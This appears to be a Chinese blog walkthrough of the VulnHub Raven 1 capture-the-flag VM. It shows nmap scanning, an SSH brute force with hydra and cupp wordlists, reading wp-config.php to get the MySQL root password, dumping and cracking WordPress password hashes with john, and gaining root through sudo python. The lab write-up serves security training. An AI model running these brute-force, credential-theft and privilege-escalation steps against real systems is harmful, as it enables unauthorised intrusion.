背景概述:
下载地址:https://www.vulnhub.com/entry/raven-1,256/
本次的靶机IP为
100.10.10.132
,将该IP地址添加到hosts文件内,映射到域名raven.local
。
技术要点:
使用arp-scan -l
命令进行局域网内部存活主机的扫描。
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:69:27:90, IPv4: 100.10.10.129
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
100.10.10.1 00:50:56:c0:00:08 VMware, Inc.
100.10.10.132 00:0c:29:5a:b1:05 VMware, Inc.
100.10.10.253 00:50:56:f5:d5:54 VMware, Inc.
100.10.10.254 00:50:56:e1:62:61 VMware, Inc.
根据MAC地址可以找到我们的靶机IP地址为100.10.10.132
。
使用nmap进行目标主机开放端口扫描,使用命令nmap -sS -Pn -p 1-65535 100.10.10.132
。
└─# nmap -sS -Pn -p 1-65535 100.10.10.132
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-28 09:41 CST
Nmap scan report for 100.10.10.132
Host is up (0.00083s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
40396/tcp open unknown
MAC Address: 00:0C:29:5A:B1:05 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 22.46 seconds
根据结果可知目标主机开放了22、80、111、40396端口。
通过信息收集,我们发现目标主机开放了80端口,因此登上网页查看相关源代码。我们发现http://raven.local/service.html
这个url链接下的源代码,存在flag字段——<!-- flag1{b9bbcb33e11b80be759c4e844862482d} -->
在网页上发现http://raven.local/wordpress/
该url下存在wordpress字段。因此可以推测该站点是使用wordpress这个cms框架搭建的。因此可以使用wp-scan
来进行扫描。
首先先更新漏洞库。
wp-scan --update
然后对该url进行扫描。
wp-scan --url http://raven.local/wordpress/
根据扫描结果,得出以下:
server: Apache/2.4.10 (Debian)
WordPress version 4.8.17
可以发现,没有什么可以利用的。
我们发现站点存在urlhttp://raven.local/wordpress/index.php/author/michael/
,发现用户名为MICHAEL
。
可以尝试用该用户名进行SSH服务爆破。
使用hydra生成字典用于密码爆破。字典使用最经典的fasttrack.txt
。
hydra -l michael -P /usr/share/wordlists/fasttrack.txt ssh://raven.local
没有爆出密码。
我们换成cupp生成的字典再进行一遍。[cpuu安装教程]
└─# cupp -i
___________
cupp.py! # Common
\ # User
\ ,__, # Passwords
\ (oo)____ # Profiler
(__) )\
||--|| * [ Muris Kurgas | j0rgan@remote-exploit.org ]
[ Mebus | https://github.com/Mebus/]
[+] Insert the information about the victim to make a dictionary
[+] If you don't know all the info, just hit enter when asked! ;)
> First Name: michael # 输入用户名
> Surname: michael # 输入用户名
> Nickname: michael # 输入用户名
> Birthdate (DDMMYYYY):
> Partners) name:
> Partners) nickname:
> Partners) birthdate (DDMMYYYY):
> Child's name:
> Child's nickname:
> Child's birthdate (DDMMYYYY):
> Pet's name:
> Company name:
> Do you want to add some key words about the victim? Y/[N]:
> Do you want to add special chars at the end of words? Y/[N]:
> Do you want to add some random numbers at the end of words? Y/[N]:
> Leet mode? (i.e. leet = 1337) Y/[N]:
[+] Now making a dictionary...
[+] Sorting list and removing duplicates...
[+] Saving dictionary to michael.txt, counting 60 words.
[+] Now load your pistolero with michael.txt and shoot! Good luck!
使用命令hydra -l michael -P ./michael.txt ssh://raven.local
,生成文件michael.txt
,利用该文件再进行一次爆破。
└─# hydra -l michael -P ./michael.txt ssh://raven.local
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-12-28 14:49:30
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 60 login tries (l:1/p:60), ~4 tries per task
[DATA] attacking ssh://raven.local:22/
[22][ssh] host: raven.local login: michael password: michael
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 5 final worker threads did not complete until end.
[ERROR] 5 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-12-28 14:49:37
爆破出了账号为michael
,密码为michael
。
使用该账号、密码登录。命令为ssh michael@raven.local
。期间会提示是否连接,输入yes
。
─# ssh michael@raven.local 255 ⨯
The authenticity of host 'raven.local (100.10.10.132)' can't be established.
ECDSA key fingerprint is SHA256:rCGKSPq0sUfa5mqn/8/M0T63OxqkEIR39pi835oSDo8.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'raven.local' (ECDSA) to the list of known hosts.
michael@raven.local's password:
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
You have new mail.
Last login: Mon Dec 27 18:25:22 2021 from 100.10.10.129
michael@Raven:~$
使用命令uname -a
查看内核版本。
michael@Raven:~$ uname -a
Linux Raven 3.16.0-6-amd64 #1 SMP Debian 3.16.57-2 (2018-07-14) x86_64 GNU/Linux
没有发现有什么可以利用的漏洞。
查看一下SUID。
michael@Raven:~$ find / -user root -perm -4000 -print 2>/dev/null
/bin/mount
/bin/umount
/bin/su
/usr/bin/procmail
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/sudo
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/sbin/sensible-mda
/sbin/mount.nfs
没有可以利用的。
遍历站点目录/var/www
,发现flag2.txt
文件。
michael@Raven:~$ cd /var/www
michael@Raven:/var/www$ ls
flag2.txt html
michael@Raven:/var/www$ cat flag2.txt
flag2{fc3fd58dcdad9ab23faca6e9a36e581c}
再查看网站的配置文件/var/www/html/wordpress/wp-config.php
。
michael@Raven:/var/www/html/wordpress$ cat wp-config.php
<?php
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the
* installation. You don't have to use the web site, you can
* copy this file to "wp-config.php" and fill in the values.
*
* This file contains the following configurations:
*
* * MySQL settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://codex.wordpress.org/Editing_wp-config.php
*
* @package WordPress
*/
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');
/** MySQL database username */
define('DB_USER', 'root');
/** MySQL database password */
define('DB_PASSWORD', 'R@v3nSecurity');
/** MySQL hostname */
define('DB_HOST', 'localhost')
发现存在MySQL账户root
,密码R@v3nSecurity
。
使用命令mysql -h localhost -u root -pR@v3nSecurity
连接上MySQL数据库。
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 68
Server version: 5.5.60-0+deb8u1 (Debian)
Copyright (c) 2000, 2018, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql>
使用命令show databases;
,查看当前数据库。
mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| performance_schema |
| wordpress |
+--------------------+
4 rows in set (0.00 sec)
使用命令use wordpress
,进入到wordpress
数据库。
mysql> use wordpress
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
使用命令show tables
,查看当前数据库存在哪些表。
mysql> show tables;
+-----------------------+
| Tables_in_wordpress |
+-----------------------+
| wp_commentmeta |
| wp_comments |
| wp_links |
| wp_options |
| wp_postmeta |
| wp_posts |
| wp_term_relationships |
| wp_term_taxonomy |
| wp_termmeta |
| wp_terms |
| wp_usermeta |
| wp_users |
+-----------------------+
12 rows in set (0.00 sec)
使用命令select * from wp_users
,查看wp_users表内的内容。
mysql> select * from wp_users;
+----+------------+------------------------------------+---------------+-------------------+----------+---------------------+---------------------+-------------+----------------+
| ID | user_login | user_pass | user_nicename | user_email | user_url | user_registered | user_activation_key | user_status | display_name |
+----+------------+------------------------------------+---------------+-------------------+----------+---------------------+---------------------+-------------+----------------+
| 1 | michael | $P$BjRvZQ.VQcGZlDeiKToCQd.cPw5XCe0 | michael | michael@raven.org | | 2018-08-12 22:49:12 | | 0 | michael |
| 2 | steven | $P$Bk3VD9jsxx/loJoqNsURgHiaB23j7W/ | steven | steven@raven.org | | 2018-08-12 23:31:16 | | 0 | Steven Seagull |
+----+------------+------------------------------------+---------------+-------------------+----------+---------------------+---------------------+-------------+----------------+
2 rows in set (0.00 sec)
发现存在用户名steven,以及该用户名的密码$P$Bk3VD9jsxx/loJoqNsURgHiaB23j7W/
。该密码是经加密后的。
先将账号密码导出为txt文本。
mysql> SELECT CONCAT(user_login, ":", user_pass) FROM wp_users INTO OUTFILE '/tmp/wordpress.txt';
Query OK, 2 rows affected (0.00 sec)
查看该文本内容。
michael@Raven:/usr/share$ cat /tmp/wordpress.txt
michael:$P$BjRvZQ.VQcGZlDeiKToCQd.cPw5XCe0
steven:$P$Bk3VD9jsxx/loJoqNsURgHiaB23j7W/
在目标主机上开启http服务进行wordpress.txt
文件的传输。在目标主机上进入/tmp
目录,运行命令python -m SimpleHTTPServer 8888
。
michael@Raven:/tmp$ python -m SimpleHTTPServer 8888
Serving HTTP on 0.0.0.0 port 8888 ...
在kali上下载目标主机的wordpress.txt
文件。使用命令wget http://raven.local:8888/wordpress.txt
。
└─# wget http://raven.local:8888/wordpress.txt
--2021-12-28 16:27:32-- http://raven.local:8888/wordpress.txt
正在解析主机 raven.local (raven.local)... 100.10.10.132
正在连接 raven.local (raven.local)|100.10.10.132|:8888... 已连接。
已发出 HTTP 请求,正在等待回应... 200 OK
长度:85 [text/plain]
正在保存至: “wordpress.txt”
wordpress.txt 100%[=====================================================>] 85 --.-KB/s 用时 0s
2021-12-28 16:27:32 (1.47 MB/s) - 已保存 “wordpress.txt” [85/85])
使用著名的rockyou.txt
(kali自带)字典进行密码的爆破。在usr/share/wordlists
目录下运行以下该命令生成rockyou.txt
文件。
dirb dirbuster fasttrack.txt fern-wifi metasploit nmap.lst rockyou.txt.gz
gzip -d rockyou.txt.gz
在kali机上,进入wordpress.txt
文件所在的目录,运行以下命令,使用john进行密码破解。
└─# john --wordlist=/usr/share/wordlists/rockyou.txt wordpress.txt
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (phpass [phpass ($P$ or $H$) 256/256 AVX2 8x3])
Cost 1 (iteration count) is 8192 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
pink84 (steven)
得出steven
账号的密码为pink84
。
使用该账号远程ssh远程连接。使用命令ssh steven@raven.local
。
└─# ssh steven@raven.local
steven@raven.local's password:
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Mon Dec 27 18:43:33 2021 from 100.10.10.129
查看当前用户权限。
$ whoami
steven
尝试使用sudo Python
提权。
使用命令sudo python3 -c 'import pty; pty.spawn("/bin/sh")'
,提权失败。
使用命令sudo python -c 'import os; os.system("/bin/sh")'
,提权成功。
$ sudo python -c 'import os; os.system("/bin/sh")'
# whoami
root
进入根目录,查看最后一个flag。
# cd /root
# ls
flag4.txt
# cat flag4.txt
______
| ___ \
| |_/ /__ ___ _____ _ __
| // _` \ \ / / _ \ '_ \
| |\ \ (_| |\ V / __/ | | |
\_| \_\__,_| \_/ \___|_| |_|
flag4{715dea6c055b9fe3337544932f2941ce}
CONGRATULATIONS on successfully rooting Raven!
This is my first Boot2Root VM - I hope you enjoyed it.
Hit me up on Twitter and let me know what you thought:
@mccannwj / wjmccann.github.io